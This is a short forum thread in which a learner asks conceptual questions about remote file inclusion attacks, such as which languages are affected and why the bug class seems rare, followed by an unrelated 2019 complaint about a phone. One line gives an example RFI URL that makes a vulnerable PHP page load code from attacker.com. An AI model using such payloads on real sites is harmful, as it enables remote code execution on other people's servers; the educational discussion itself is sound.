Darksat IT Security Forums

Hardware, Software and Security => IT Security Forum => Topic started by: manoj9372 on September 01, 2011, 10:41:57 pm



Title: Some questions on Remote file inclusion attacks?
Post by: manoj9372 on September 01, 2011, 10:41:57 pm
Hi guys,
i have been started to learn/read about RFI attacks and i have readed some books,documents and some tutorials regarding this.

At the i have been ended up with some questions,i tought it would be good to ask here

here are my questions:

1)does RFI attacks only works with the php language?
2)dont this attack work on other server side scripting languages such as jsp,asp and other server side scripting languages?
3)if yes why?
4)is this the one and only form of RFI injection?
Code:
http://www.target.com/vuln_page.php?file=http://attacker.com/malicious
5)Also what types of files can be injected in the space "malicious"
is this only limited to php and txt files ?
6)why this class of vulnerability is dying very fast ?,because when i checked in sites like 1337day and exploit-db for these kind of bugs
i had seen that last RFI has been posted before 3-4 months,so it seems this breed of bug is dying fast.

Looking for some answers..


Title: Re: Some questions on Remote file inclusion attacks?
Post by: geemail on February 23, 2019, 03:39:44 am
My phone as soon as I put my driver's licence or email will instantly upload a whole bunch of apps I can't uninstall and runs all sorts of shite I can't change in the backround